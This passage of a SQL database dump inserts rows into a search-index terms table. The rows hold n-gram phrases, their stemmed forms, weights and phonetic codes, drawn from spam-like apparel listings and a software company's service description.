a',0,1,1.5,'S632343',1,'en'),(51733,'shirts outlet space','shirt outlet space',0,1,1.6333,'S632343212',1,'en'),(51734,'shorts at','short at',0,1,1.3,'S6323',1,'en'),(51735,'shorts at wholesale','short at wholesale',0,1,1.6333,'S6323424',1,'en'),(51736,'shorts for','short for',0,1,1.3333,'S63216',1,'en'),(51737,'shorts for men','short for men',0,1,1.4667,'S632165',1,'en'),(51738,'shorts men high','short men high',0,1,1.5,'S63252',1,'en'),(51739,'shorts sem','short sem',0,1,1.3333,'S6325',1,'en'),(51740,'shorts sem model','short sem model',0,1,1.5333,'S632534',1,'en'),(51741,'silverware','silverwar',0,0,0.6667,'S416',1,'en'),(51742,'silverware this','silverwar this',0,1,1.5,'S41632',1,'en'),(51743,'silverware this design','silverwar this design',0,1,1.7333,'S41632325',1,'en'),(51744,'single bag','singl bag',0,1,1.3333,'S52412',1,'en'),(51745,'single bag air','singl bag air',0,1,1.4667,'S524126',1,'en'),(51746,'size polo','size polo',0,1,1.3,'S140',1,'en'),(51747,'size polo ralph','size polo ralph',0,1,1.5,'S14641',1,'en'),(51748,'size ralph','size ralph',0,1,1.3333,'S641',1,'en'),(51749,'size ralph lauren','size ralph lauren',0,1,1.5667,'S641465',1,'en'),(51750,'sizes','size',0,0,0.3333,'S000',1,'en'),(51751,'sizes rated','size rated',0,1,1.3667,'S630',1,'en'),(51752,'sizes rated by','size rated by',0,1,1.4667,'S631',1,'en'),(51753,'sizing','size',0,0,0.4,'S520',1,'en'),(51754,'sizing computer','size computer',0,1,1.5,'S525136',1,'en'),(51755,'sizing computer monitor','size computer monitor',0,1,1.7667,'S525136536',1,'en'),(51756,'sleeve polo 3','sleev polo 3',0,1,1.4333,'S414',1,'en'),(51757,'sleeve polo men','sleev polo men',0,1,1.5,'S4145',1,'en'),(51758,'sleeve polo nsa','sleev polo nsa',0,1,1.5,'S41452',1,'en'),(51759,'solid','solid',0,0,0.3333,'S430',1,'en'),(51760,'solid steel','solid steel',0,1,1.3667,'S43234',1,'en'),(51761,'solid steel rotor','solid steel rotor',0,1,1.5667,'S43234636',1,'en'),(51762,'solid steel rotors','solid steel rotors',0,1,1.6,'S432346362',1,'en'),(51763,'space wishes','space wishes',0,1,1.4,'S120',1,'en'),(51764,'space wishes search','space wishes search',0,1,1.6333,'S1262',1,'en'),(51765,'specify','specifi',0,0,0.4667,'S121',1,'en'),(51766,'specify system','specifi system',0,1,1.4667,'S121235',1,'en'),(51767,'specify system mens','specifi system mens',0,1,1.6333,'S1212352',1,'en'),(51768,'spinning inertia','spin inertia',0,1,1.5333,'S152563',1,'en'),(51769,'spinning inertia resulting','spin inertia resulting',0,1,1.8667,'S152563624352',1,'en'),(51770,'sport shirt 1','sport shirt 1',0,1,1.4333,'S163263',1,'en'),(51771,'sport shirt nsa','sport shirt nsa',0,1,1.5,'S16326352',1,'en'),(51772,'standrad','standrad',0,0,0.5333,'S35363',1,'en'),(51773,'standrad 3','standrad 3',0,1,1.3333,'S35363',1,'en'),(51774,'standrad 3 32','standrad 3 32',0,1,1.4333,'S35363',1,'en'),(51775,'steel','steel',0,0,0.3333,'S340',1,'en'),(51776,'steel rotor','steel rotor',0,1,1.3667,'S34636',1,'en'),(51777,'steel rotor 5','steel rotor 5',0,1,1.4333,'S34636',1,'en'),(51778,'steel rotors','steel rotors',0,1,1.4,'S346362',1,'en'),(51779,'steel rotors with','steel rotors with',0,1,1.5667,'S3463623',1,'en'),(51780,'store 600','store 600',0,1,1.3,'S360',1,'en'),(51781,'store 600 lbs','store 600 lbs',0,1,1.4333,'S36412',1,'en'),(51782,'store appropriate','store appropriate',0,1,1.5667,'S3616163',1,'en'),(51783,'store appropriate ralph','store appropriate ralph',0,1,1.7667,'S3616163641',1,'en'),(51784,'stronger','stronger',0,0,0.5333,'S36526',1,'en'),(51785,'stronger cutting','stronger cutting',0,1,1.5333,'S365262352',1,'en'),(51786,'stronger cutting system','stronger cutting system',0,1,1.7667,'S36526235235',1,'en'),(51787,'sweaters 10','sweater 10',0,1,1.3667,'S362',1,'en'),(51788,'sweaters 10 cheap','sweater 10 cheap',0,1,1.5667,'S3621',1,'en'),(51789,'sweaters room','sweater room',0,1,1.4333,'S36265',1,'en'),(51790,'sweaters room size','sweater room size',0,1,1.6,'S362652',1,'en'),(51791,'sweatshirts womens','sweatshirt womens',0,1,1.6,'S3263252',1,'en'),(51792,'sweatshirts womens nsa','sweatshirt womens nsa',0,1,1.7333,'S326325252',1,'en'),(51793,'system 3','system 3',0,1,1.2667,'S350',1,'en'),(51794,'system 3 windmill','system 3 windmill',0,1,1.5667,'S35354',1,'en'),(51795,'system mens','system mens',0,1,1.3667,'S352',1,'en'),(51796,'system mens ralph','system mens ralph',0,1,1.5667,'S352641',1,'en'),(51797,'system with','system with',0,1,1.3667,'S353',1,'en'),(51798,'system with polo','system with polo',0,1,1.5333,'S35314',1,'en'),(51799,'system with ralph','system with ralph',0,1,1.5667,'S353641',1,'en'),(51800,'tape ralph','tape ralph',0,1,1.3333,'T1641',1,'en'),(51801,'tape ralph lauren','tape ralph lauren',0,1,1.5667,'T1641465',1,'en'),(51802,'techniques','techniqu',0,0,0.6667,'T252',1,'en'),(51803,'techniques to','techniqu to',0,1,1.4333,'T2523',1,'en'),(51804,'techniques to destroy','techniqu to destroy',0,1,1.7,'T2523236',1,'en'),(51805,'the exact sem','the exact sem',0,1,1.4333,'T2325',1,'en'),(51806,'the extensive','the extensive',0,1,1.4333,'T23521',1,'en'),(51807,'the extensive mens','the extensive mens',0,1,1.6,'T2352152',1,'en'),(51808,'the ideal for','the ideal for',0,1,1.4333,'T416',1,'en'),(51809,'the polo ralph','the polo ralph',0,1,1.4667,'T14641',1,'en'),(51810,'the wrecking','the wrecking',0,1,1.4,'T6252',1,'en'),(51811,'the wrecking of','the wrecking of',0,1,1.5,'T62521',1,'en'),(51812,'thick chef','thick chef',0,1,1.3333,'T210',1,'en'),(51813,'thick chef cutlery','thick chef cutlery',0,1,1.6,'T212346',1,'en'),(51814,'this design','thi design',0,1,1.3667,'T2325',1,'en'),(51815,'this design generates','thi design generates',0,1,1.7,'T232525632',1,'en'),(51816,'this equiptment','thi equiptment',0,1,1.5,'T21353',1,'en'),(51817,'this equiptment large','thi equiptment large',0,1,1.7,'T21353462',1,'en'),(51818,'this mens','thi mens',0,1,1.3,'T252',1,'en'),(51819,'this mens ralph','thi mens ralph',0,1,1.5,'T252641',1,'en'),(51820,'to 250','to 250',0,1,1.2,'T000',1,'en'),(51821,'to 250 cheap','to 250 cheap',0,1,1.4,'T210',1,'en'),(51822,'to 550','to 550',0,1,1.2,'T000',1,'en'),(51823,'to 550 pounds','to 550 pounds',0,1,1.4333,'T1532',1,'en'),(51824,'to destroy','to destroy',0,1,1.3333,'T236',1,'en'),(51825,'to destroy any','to destroy any',0,1,1.4667,'T2365',1,'en'),(51826,'to handle denser','to handle denser',0,1,1.5333,'T5343526',1,'en'),(51827,'to hr','to hr',0,1,1.1667,'T600',1,'en'),(51828,'to hr mens','to hr mens',0,1,1.3333,'T652',1,'en'),(51829,'to the ideal','to the ideal',0,1,1.4,'T400',1,'en'),(51830,'today we','todai we',0,1,1.2667,'T000',1,'en'),(51831,'today we have','todai we have',0,1,1.4333,'T100',1,'en'),(51832,'trimming','trim',0,0,0.5333,'T652',1,'en'),(51833,'trimming system','trim system',0,1,1.5,'T65235',1,'en'),(51834,'trimming system with','trim system with',0,1,1.6667,'T652353',1,'en'),(51835,'type of bulk','type of bulk',0,1,1.4,'T142',1,'en'),(51836,'units','unit',0,0,0.3333,'U532',1,'en'),(51837,'units in','unit in',0,1,1.2667,'U5325',1,'en'),(51838,'units in ralph','unit in ralph',0,1,1.4667,'U5325641',1,'en'),(51839,'units now','unit now',0,1,1.3,'U5325',1,'en'),(51840,'units now polo','unit now polo',0,1,1.4667,'U532514',1,'en'),(51841,'up to 250','up to 250',0,1,1.3,'U130',1,'en'),(51842,'up to 550','up to 550',0,1,1.3,'U130',1,'en'),(51843,'usages along','usag along',0,1,1.4,'U2452',1,'en'),(51844,'usages along with','usag along with',0,1,1.5667,'U24523',1,'en'),(51845,'use in','us in',0,1,1.2,'U250',1,'en'),(51846,'use in more','us in more',0,1,1.3667,'U256',1,'en'),(51847,'use proven','us proven',0,1,1.3333,'U21615',1,'en'),(51848,'use proven rotary','us proven rotary',0,1,1.5667,'U21615636',1,'en'),(51849,'used with','us with',0,1,1.3,'U230',1,'en'),(51850,'used with adequate','us with adequate',0,1,1.6,'U2323',1,'en'),(51851,'various waste','variou waste',0,1,1.4333,'V623',1,'en'),(51852,'various waste ralph','variou waste ralph',0,1,1.6333,'V623641',1,'en'),(51853,'volume','volum',0,0,0.4,'V450',1,'en'),(51854,'volume destruction','volum destruction',0,1,1.6,'V453236235',1,'en'),(51855,'volume destruction well','volum destruction well',0,1,1.7667,'V4532362354',1,'en'),(51856,'volume ralph','volum ralph',0,1,1.4,'V45641',1,'en'),(51857,'volume ralph lauren','volum ralph lauren',0,1,1.6333,'V45641465',1,'en'),(51858,'volumes','volum',0,0,0.4667,'V452',1,'en'),(51859,'volumes of','volum of',0,1,1.3333,'V4521',1,'en'),(51860,'volumes of items','volum of items',0,1,1.5333,'V4521352',1,'en'),(51861,'w','w',0,0,0.0667,'W000',1,'en'),(51862,'w x','w x',0,1,1.1,'W200',1,'en'),(51863,'w x 6','w x 6',0,1,1.1667,'W200',1,'en'),(51864,'waste ralph','wast ralph',0,1,1.3667,'W23641',1,'en'),(51865,'waste ralph lauren','wast ralph lauren',0,1,1.6,'W23641465',1,'en'),(51866,'waste sizing','wast sizing',0,1,1.4,'W23252',1,'en'),(51867,'waste sizing computer','wast sizing computer',0,1,1.7,'W232525136',1,'en'),(51868,'waste specify','wast specify',0,1,1.4333,'W232121',1,'en'),(51869,'waste specify system','wast specify system',0,1,1.6667,'W232121235',1,'en'),(51870,'we have ralph','we have ralph',0,1,1.4333,'W1641',1,'en'),(51871,'web feed','web feed',0,1,1.2667,'W130',1,'en'),(51872,'web feed opening','web feed opening',0,1,1.5333,'W13152',1,'en'),(51873,'well over','well over',0,1,1.3,'W416',1,'en'),(51874,'well over 600','well over 600',0,1,1.4333,'W416',1,'en'),(51875,'what\'s needed of','what needed of',0,1,1.5333,'W32531',1,'en'),(51876,'when used','when used',0,1,1.3,'W523',1,'en'),(51877,'when used with','when used with',0,1,1.4667,'W523',1,'en'),(51878,'wholesale prices','wholesal prices',0,1,1.5333,'W424162',1,'en'),(51879,'wholesale prices womens','wholesal prices womens',0,1,1.7667,'W42416252',1,'en'),(51880,'wholesale womens','wholesal womens',0,1,1.5333,'W42452',1,'en'),(51881,'wholesale womens ralph','wholesal womens ralph',0,1,1.7333,'W42452641',1,'en'),(51882,'windmill','windmil',0,0,0.5333,'W5354',1,'en'),(51883,'windmill 2','windmil 2',0,1,1.3333,'W5354',1,'en'),(51884,'windmill 2 bed','windmil 2 bed',0,1,1.4667,'W535413',1,'en'),(51885,'wishes search','wish search',0,1,1.4333,'W262',1,'en'),(51886,'wishes search engine','wish search engine',0,1,1.6667,'W262525',1,'en'),(51887,'with 5','with 5',0,1,1.2,'W300',1,'en'),(51888,'with 5 8','with 5 8',0,1,1.2667,'W300',1,'en'),(51889,'with a cheap','with a cheap',0,1,1.4,'W321',1,'en'),(51890,'with adequate','with adequate',0,1,1.4333,'W323',1,'en'),(51891,'with adequate waste','with adequate waste',0,1,1.6333,'W32323',1,'en'),(51892,'with polo','with polo',0,1,1.3,'W314',1,'en'),(51893,'with polo ralph','with polo ralph',0,1,1.5,'W314641',1,'en'),(51894,'women been','women been',0,1,1.3333,'W515',1,'en'),(51895,'women been evaluated','women been evaluated',0,1,1.6667,'W515143',1,'en'),(51896,'women d','women d',0,1,1.2333,'W530',1,'en'),(51897,'women d x','women d x',0,1,1.3,'W532',1,'en'),(51898,'women dresses web','women dresses web',0,1,1.5667,'W53621',1,'en'),(51899,'women in various','women in various',0,1,1.5333,'W5162',1,'en'),(51900,'women this mens','women this mens',0,1,1.5,'W53252',1,'en'),(51901,'women use','women use',0,1,1.3,'W520',1,'en'),(51902,'women use in','women use in',0,1,1.4,'W525',1,'en'),(51903,'womens hoodies outlet','women hoodies outlet',0,1,1.7,'W5232343',1,'en'),(51904,'womens nsa','women nsa',0,1,1.3333,'W5252',1,'en'),(51905,'womens nsa css','women nsa css',0,1,1.4667,'W5252',1,'en'),(51906,'womens shirts','women shirts',0,1,1.4333,'W52632',1,'en'),(51907,'womens shirts cutting','women shirts cutting',0,1,1.7,'W52632352',1,'en'),(51908,'womens sweaters 10','women sweaters 10',0,1,1.6,'W52362',1,'en'),(51909,'womens sweaters room','women sweaters room',0,1,1.6667,'W5236265',1,'en'),(51910,'wrecking','wreck',0,0,0.5333,'W6252',1,'en'),(51911,'wrecking of','wreck of',0,1,1.3667,'W62521',1,'en'),(51912,'wrecking of paper','wreck of paper',0,1,1.5667,'W625216',1,'en'),(51913,'x 6','x 6',0,1,1.1,'X000',1,'en'),(51914,'x 6 the','x 6 the',0,1,1.2333,'X300',1,'en'),(51915,'x 7','x 7',0,1,1.1,'X000',1,'en'),(51916,'x 7 w','x 7 w',0,1,1.1667,'X000',1,'en'),(51917,'x ralph','x ralph',0,1,1.2333,'X641',1,'en'),(51918,'x ralph lauren','x ralph lauren',0,1,1.4667,'X641465',1,'en'),(51919,'113','113',0,0,0.3,'',1,'en'),(51920,'114','114',0,0,0.3,'',1,'en'),(52359,'118','118',0,0,0.3,'',1,'en'),(52360,'already working','alreadi working',0,1,1.5,'A4636252',1,'en'),(52361,'already working in','alreadi working in',0,1,1.6,'A46362525',1,'en'),(52362,'and architectural','and architectural',0,1,1.5667,'A536232364',1,'en'),(52363,'and architectural design','and architectural design',0,1,1.8,'A536232364325',1,'en'),(52364,'and data-stream','and data-stream',0,1,1.5,'A532365',1,'en'),(52365,'and data-stream through','and data-stream through',0,1,1.7667,'A532365362',1,'en'),(52366,'and development','and development',0,1,1.5,'A5314153',1,'en'),(52367,'and development support','and development support',0,1,1.7667,'A53141532163',1,'en'),(52368,'and development through','and development through',0,1,1.7667,'A531415362',1,'en'),(52369,'and experiences','and experiences',0,1,1.5,'A5321652',1,'en'),(52370,'and experiences systems','and experiences systems',0,1,1.7667,'A5321652352',1,'en'),(52371,'and maintenance delivered','and maintenance delivered',0,1,1.8333,'A53535234163',1,'en'),(52372,'and maintenance fit','and maintenance fit',0,1,1.6333,'A53535213',1,'en'),(52373,'application management','applic management',0,1,1.7333,'A14235253',1,'en'),(52374,'application management and','applic management and',0,1,1.8667,'A1423525353',1,'en'),(52375,'applications already','applic already',0,1,1.6667,'A142352463',1,'en'),(52376,'applications already working','applic already working',0,1,1.9333,'A1423524636252',1,'en'),(52377,'architectural','architectur',0,0,0.8667,'A6232364',1,'en'),(52378,'architectural design','architectur design',0,1,1.6667,'A6232364325',1,'en'),(52379,'architectural design and','architectur design and',0,1,1.8,'A62323643253',1,'en'),(52380,'area fit','area fit',0,1,1.2667,'A613',1,'en'),(52381,'area fit is','area fit is',0,1,1.3667,'A6132',1,'en'),(52382,'aspect','aspect',0,0,0.4,'A2123',1,'en'),(52383,'aspect of','aspect of',0,1,1.3,'A21231',1,'en'),(52384,'aspect of the','aspect of the',0,1,1.4333,'A212313',1,'en'),(52385,'assets of','asset of',0,1,1.3,'A2321',1,'en'),(52386,'assets of knowledge','asset of knowledge',0,1,1.6333,'A232125432',1,'en'),(52387,'besides ready-made','besid ready-made',0,1,1.6,'B2326353',1,'en'),(52388,'besides ready-made applications','besid ready-made applications',0,1,2,'B2326353142352',1,'en'),(52389,'brokerage system','brokerag system',0,1,1.5333,'B626235',1,'en'),(52390,'brokerage system wealth','brokerag system wealth',0,1,1.7667,'B62623543',1,'en'),(52391,'built on','built on',0,1,1.2667,'B435',1,'en'),(52392,'built on the','built on the',0,1,1.4,'B4353',1,'en'),(52393,'can develop','can develop',0,1,1.3667,'C53141',1,'en'),(52394,'can develop any','can develop any',0,1,1.5,'C531415',1,'en'),(52395,'company can','compani can',0,1,1.3667,'C51525',1,'en'),(52396,'company can develop','compani can develop',0,1,1.6333,'C515253141',1,'en'),(52397,'complete solution','complet solution',0,1,1.5667,'C51432435',1,'en'),(52398,'complete solution built','complet solution built',0,1,1.7667,'C51432435143',1,'en'),(52399,'consideration','consider',0,0,0.8667,'C523635',1,'en'),(52400,'consideration every','consider every',0,1,1.6333,'C52363516',1,'en'),(52401,'consideration every aspect','consider every aspect',0,1,1.8667,'C523635162123',1,'en'),(52402,'consultancy','consult',0,0,0.7333,'C524352',1,'en'),(52403,'consultancy design','consult design',0,1,1.6,'C524352325',1,'en'),(52404,'consultancy design and','consult design and',0,1,1.7333,'C5243523253',1,'en'),(52405,'consultancy supporting','consult supporting',0,1,1.7333,'C52435216352',1,'en'),(52406,'consultancy supporting its','consult supporting its',0,1,1.8667,'C5243521635232',1,'en'),(52407,'customers for','custom for',0,1,1.4333,'C356216',1,'en'),(52408,'customers for any','custom for any',0,1,1.5667,'C3562165',1,'en'),(52409,'customers in the','custom in the',0,1,1.5333,'C356253',1,'en'),(52410,'customers with','custom with',0,1,1.4667,'C35623',1,'en'); INSERT INTO `fit_finder_terms` VALUES (52411,'customers with expertise','custom with expertise',0,1,1.8,'C3562321632',1,'en'),(52412,'data-stream','data-stream',0,0,0.7333,'D2365',1,'en'),(52413,'data-stream through','data-stream through',0,1,1.6333,'D2365362',1,'en'),(52414,'data-stream through solutions','data-stream through solutions',0,1,1.9667,'D23653624352',1,'en'),(52415,'delivered to','deliv to',0,1,1.4,'D4163',1,'en'),(52416,'delivered to the','deliv to the',0,1,1.5333,'D4163',1,'en'),(52417,'design and','design and',0,1,1.3333,'D253',1,'en'),(52418,'design and development','design and development',0,1,1.7333,'D25314153',1,'en'),(52419,'design phase','design phase',0,1,1.4,'D2512',1,'en'),(52420,'design phase keeping','design phase keeping',0,1,1.6667,'D2512152',1,'en'),(52421,'develop','develop',0,0,0.4667,'D141',1,'en'),(52422,'develop any','develop any',0,1,1.3667,'D1415',1,'en'),(52423,'develop any type','develop any type',0,1,1.5333,'D141531',1,'en'),(52424,'development support','develop support',0,1,1.6333,'D141532163',1,'en'),(52425,'development support and','develop support and',0,1,1.7667,'D14153216353',1,'en'),(52426,'development through','develop through',0,1,1.6333,'D1415362',1,'en'),(52427,'development through its','develop through its',0,1,1.7667,'D141536232',1,'en'),(52428,'east','east',0,0,0.2667,'E230',1,'en'),(52429,'east area','east area',0,1,1.3,'E236',1,'en'),(52430,'east area fit','east area fit',0,1,1.4333,'E23613',1,'en'),(52431,'every aspect','everi aspect',0,1,1.4,'E162123',1,'en'),(52432,'every aspect of','everi aspect of',0,1,1.5,'E1621231',1,'en'),(52433,'experiences','experi',0,0,0.7333,'E21652',1,'en'),(52434,'experiences systems','experi systems',0,1,1.6333,'E21652352',1,'en'),(52435,'experiences systems support','experi systems support',0,1,1.9,'E21652352163',1,'en'),(52436,'expertise','expertis',0,0,0.6,'E21632',1,'en'),(52437,'expertise in','expertis in',0,1,1.4,'E216325',1,'en'),(52438,'expertise in the','expertis in the',0,1,1.5333,'E2163253',1,'en'),(52439,'fit is provide','fit is provide',0,1,1.4667,'F321613',1,'en'),(52440,'fit products','fit products',0,1,1.4,'F3163232',1,'en'),(52441,'fit products portfolio','fit products portfolio',0,1,1.7333,'F316323216314',1,'en'),(52442,'fit provides','fit provides',0,1,1.4,'F316132',1,'en'),(52443,'fit provides four','fit provides four',0,1,1.5667,'F31613216',1,'en'),(52444,'following sectors','follow sectors',0,1,1.5667,'F452362',1,'en'),(52445,'for any type','for any type',0,1,1.4,'F6531',1,'en'),(52446,'four products','four products',0,1,1.4333,'F6163232',1,'en'),(52447,'four products to','four products to',0,1,1.5333,'F61632323',1,'en'),(52448,'functional','function',0,0,0.6667,'F52354',1,'en'),(52449,'functional and','function and',0,1,1.4667,'F5235453',1,'en'),(52450,'functional and architectural','function and architectural',0,1,1.9333,'F52354536232364',1,'en'),(52451,'gulf','gulf',0,0,0.2667,'G410',1,'en'),(52452,'gulf region','gulf region',0,1,1.3667,'G41625',1,'en'),(52453,'gulf region real','gulf region real',0,1,1.5333,'G4162564',1,'en'),(52454,'in consideration','in consideration',0,1,1.5333,'I52523635',1,'en'),(52455,'in consideration every','in consideration every',0,1,1.7333,'I5252363516',1,'en'),(52456,'in the design','in the design',0,1,1.4333,'I5325',1,'en'),(52457,'in the following','in the following',0,1,1.5333,'I531452',1,'en'),(52458,'in the gulf','in the gulf',0,1,1.3667,'I53241',1,'en'),(52459,'in the middle','in the middle',0,1,1.4333,'I53534',1,'en'),(52460,'includes','includ',0,0,0.5333,'I52432',1,'en'),(52461,'is provide','is provide',0,1,1.3333,'I21613',1,'en'),(52462,'is provide its','is provide its',0,1,1.4667,'I216132',1,'en'),(52463,'its customers','it customers',0,1,1.4333,'I323562',1,'en'),(52464,'its customers in','it customers in',0,1,1.5333,'I3235625',1,'en'),(52465,'its customers with','it customers with',0,1,1.6,'I3235623',1,'en'),(52466,'its specialized','it specialized',0,1,1.5,'I3212423',1,'en'),(52467,'its specialized workgroups','it specialized workgroups',0,1,1.8667,'I321242362612',1,'en'),(52468,'keeping in','keep in',0,1,1.3333,'K1525',1,'en'),(52469,'keeping in consideration','keep in consideration',0,1,1.8,'K15252523635',1,'en'),(52470,'knowledge','knowledg',0,0,0.6,'K5432',1,'en'),(52471,'knowledge and','knowledg and',0,1,1.4333,'K543253',1,'en'),(52472,'knowledge and experiences','knowledg and experiences',0,1,1.8333,'K54325321652',1,'en'),(52473,'maintenance delivered','mainten delivered',0,1,1.7,'M35234163',1,'en'),(52474,'maintenance delivered to','mainten delivered to',0,1,1.8,'M35234163',1,'en'),(52475,'maintenance fit','mainten fit',0,1,1.5,'M35213',1,'en'),(52476,'maintenance fit provides','mainten fit provides',0,1,1.8,'M3521316132',1,'en'),(52477,'management and','manag and',0,1,1.4667,'M25353',1,'en'),(52478,'management and data-stream','manag and data-stream',0,1,1.8667,'M253532365',1,'en'),(52479,'management software','manag software',0,1,1.6333,'M2532136',1,'en'),(52480,'management software ipo','manag software ipo',0,1,1.7667,'M25321361',1,'en'),(52481,'management software portfolio','manag software portfolio',0,1,1.9667,'M253213616314',1,'en'),(52482,'middle east','middl east',0,1,1.3667,'M3423',1,'en'),(52483,'middle east area','middl east area',0,1,1.5333,'M34236',1,'en'),(52484,'of complete','of complete',0,1,1.3667,'O125143',1,'en'),(52485,'of complete solution','of complete solution',0,1,1.6667,'O1251432435',1,'en'),(52486,'of knowledge','of knowledge',0,1,1.4,'O125432',1,'en'),(52487,'of knowledge and','of knowledge and',0,1,1.5333,'O12543253',1,'en'),(52488,'of requirement','of requirement',0,1,1.4667,'O162653',1,'en'),(52489,'of requirement relevant','of requirement relevant',0,1,1.7667,'O16265364153',1,'en'),(52490,'of the system','of the system',0,1,1.4333,'O13235',1,'en'),(52491,'on the assets','on the assets',0,1,1.4333,'O53232',1,'en'),(52492,'phase','phase',0,0,0.3333,'P200',1,'en'),(52493,'phase keeping','phase keeping',0,1,1.4333,'P2152',1,'en'),(52494,'phase keeping in','phase keeping in',0,1,1.5333,'P21525',1,'en'),(52495,'portfolio includes','portfolio includes',0,1,1.6,'P631452432',1,'en'),(52496,'portfolio management software','portfolio management software',0,1,1.9667,'P631452532136',1,'en'),(52497,'products portfolio','product portfolio',0,1,1.6,'P6323216314',1,'en'),(52498,'products portfolio includes','product portfolio includes',0,1,1.9,'P632321631452432',1,'en'),(52499,'products to','product to',0,1,1.3667,'P632323',1,'en'),(52500,'products to customers','product to customers',0,1,1.7,'P63232323562',1,'en'),(52501,'provide its','provid its',0,1,1.3667,'P6132',1,'en'),(52502,'provide its customers','provid its customers',0,1,1.7,'P61323562',1,'en'),(52503,'provides','provid',0,0,0.5333,'P6132',2,'en'),(52504,'provides four','provid four',0,1,1.4333,'P613216',1,'en'),(52505,'provides four products','provid four products',0,1,1.7333,'P613216163232',1,'en'),(52506,'ready-made','ready-mad',0,0,0.6667,'R353',1,'en'),(52507,'ready-made applications','ready-mad applications',0,1,1.7667,'R353142352',1,'en'),(52508,'ready-made applications already','ready-mad applications already',0,1,2,'R353142352463',1,'en'),(52509,'real time brokerage','real time brokerage',0,1,1.6333,'R43516262',1,'en'),(52510,'region real','region real',0,1,1.3667,'R2564',1,'en'),(52511,'region real time','region real time',0,1,1.5333,'R256435',1,'en'),(52512,'relevant','relev',0,0,0.5333,'R4153',1,'en'),(52513,'relevant to','relev to',0,1,1.3667,'R4153',1,'en'),(52514,'relevant to software','relev to software',0,1,1.6667,'R41532136',1,'en'),(52515,'requirement relevant','requir relevant',0,1,1.6667,'R265364153',1,'en'),(52516,'requirement relevant to','requir relevant to',0,1,1.7667,'R265364153',1,'en'),(52517,'sectors','sector',0,0,0.4667,'S362',1,'en'),(52518,'software application','softwar application',0,1,1.6667,'S13614235',1,'en'),(52519,'software application management','softwar application management',0,1,2,'S13614235253',1,'en'),(52520,'software ipo','softwar ipo',0,1,1.4,'S1361',1,'en'),(52521,'software ipo manager','softwar ipo manager',0,1,1.6667,'S1361526',1,'en'),(52522,'software portfolio','softwar portfolio',0,1,1.6,'S13616314',1,'en'),(52523,'software portfolio management','softwar portfolio management',0,1,1.9667,'S136163145253',1,'en'),(52524,'solution built','solut built',0,1,1.4667,'S435143',1,'en'),(52525,'solution built on','solut built on',0,1,1.5667,'S4351435',1,'en'),(52526,'solutions consultancy','solut consultancy',0,1,1.7,'S4352524352',1,'en'),(52527,'solutions consultancy design','solut consultancy design',0,1,1.9333,'S4352524352325',1,'en'),(52528,'specialized','special',0,0,0.7333,'S12423',1,'en'),(52529,'specialized workgroups','special workgroups',0,1,1.7333,'S1242362612',1,'en'),(52530,'specialized workgroups the','special workgroups the',0,1,1.8667,'S12423626123',1,'en'),(52531,'support and','support and',0,1,1.3667,'S16353',1,'en'),(52532,'support and maintenance','support and maintenance',0,1,1.7667,'S163535352',1,'en'),(52533,'supporting','support',0,0,0.6667,'S16352',1,'en'),(52534,'supporting its','support its',0,1,1.4667,'S1635232',1,'en'),(52535,'supporting its customers','support its customers',0,1,1.8,'S16352323562',1,'en'),(52536,'system technical','system technical',0,1,1.5333,'S3532524',1,'en'),(52537,'system technical functional','system technical functional',0,1,1.9,'S3532524152354',1,'en'),(52538,'system wealth','system wealth',0,1,1.4333,'S3543',1,'en'),(52539,'system wealth management','system wealth management',0,1,1.8,'S35435253',1,'en'),(52540,'systems support','system support',0,1,1.5,'S352163',1,'en'),(52541,'systems support and','system support and',0,1,1.6333,'S35216353',1,'en'),(52542,'technical functional','technic functional',0,1,1.6667,'T2524152354',1,'en'),(52543,'technical functional and','technic functional and',0,1,1.8,'T252415235453',1,'en'),(52544,'the assets','the assets',0,1,1.3333,'T232',1,'en'),(52545,'the assets of','the assets of',0,1,1.4333,'T2321',1,'en'),(52546,'the company can','the company can',0,1,1.5,'T251525',1,'en'),(52547,'the customers for','the customers for',0,1,1.5667,'T2356216',1,'en'),(52548,'the design','the design',0,1,1.3333,'T250',1,'en'),(52549,'the design phase','the design phase',0,1,1.5333,'T2512',1,'en'),(52550,'the following sectors','the following sectors',0,1,1.7,'T1452362',1,'en'),(52551,'the gulf','the gulf',0,1,1.2667,'T241',1,'en'),(52552,'the gulf region','the gulf region',0,1,1.5,'T241625',1,'en'),(52553,'the middle east','the middle east',0,1,1.5,'T53423',1,'en'),(52554,'the system technical','the system technical',0,1,1.6667,'T23532524',1,'en'),(52555,'through its','through its',0,1,1.3667,'T6232',1,'en'),(52556,'through its specialized','through its specialized',0,1,1.7667,'T623212423',1,'en'),(52557,'through solutions','through solutions',0,1,1.5667,'T624352',1,'en'),(52558,'through solutions consultancy','through solutions consultancy',0,1,1.9667,'T624352524352',1,'en'),(52559,'time brokerage','time brokerage',0,1,1.4667,'T516262',1,'en'),(52560,'time brokerage system','time brokerage system',0,1,1.7,'T51626235',1,'en'),(52561,'to customers','to customers',0,1,1.4,'T23562',1,'en'),(52562,'to customers in','to customers in',0,1,1.5,'T235625',1,'en'),(52563,'to software','to software',0,1,1.3667,'T2136',1,'en'),(52564,'to software application','to software application',0,1,1.7667,'T213614235',1,'en'),(52565,'to the customers','to the customers',0,1,1.5333,'T23562',1,'en'),(52566,'type of complete','type of complete',0,1,1.5333,'T125143',1,'en'),(52567,'type of requirement','type of requirement',0,1,1.6333,'T162653',1,'en'),(52568,'wealth','wealth',0,0,0.4,'W430',1,'en'),(52569,'wealth management','wealth management',0,1,1.5667,'W435253',1,'en'),(52570,'wealth management software','wealth management software',0,1,1.8667,'W4352532136',1,'en'),(52571,'with expertise','with expertise',0,1,1.4667,'W321632',1,'en'),(52572,'with expertise in','with expertise in',0,1,1.5667,'W3216325',1,'en'),(52573,'workgroups','workgroup',0,0,0.6667,'W62612',1,'en'),(52574,'workgroups the','workgroup the',0,1,1.4667,'W626123',1,'en'),(52575,'workgroups the company','workgroup the company',0,1,1.7333,'W6261232515',1,'en'),(52576,'working in','work in',0,1,1.3333,'W62525',1,'en'),(52577,'working in the','work in the',0,1,1.4667,'W625253',1,'en'),(52578,'134','134',0,0,0.3,'',1,'en'),(52579,'2010 as','2010 as',0,1,1.2333,'A200',1,'en'),(52580,'2010 as part','2010 as part',0,1,1.4,'A2163',1,'en'),(52581,'2011 providing','2011 providing',0,1,1.4667,'P61352',1,'en'),(52582,'2011 providing both','2011 providing both',0,1,1.6333,'P6135213',1,'en'),(52583,'394040','394040',0,0,0.6,'',1,'en'),(52584,'394040 it','394040 it',0,1,1.3,'I300',1,'en'),(52585,'394040 it also','394040 it also',0,1,1.4667,'I342',1,'en'),(52586,'access to','access to',0,1,1.3,'A230',1,'en'),(52587,'access to stock','access to 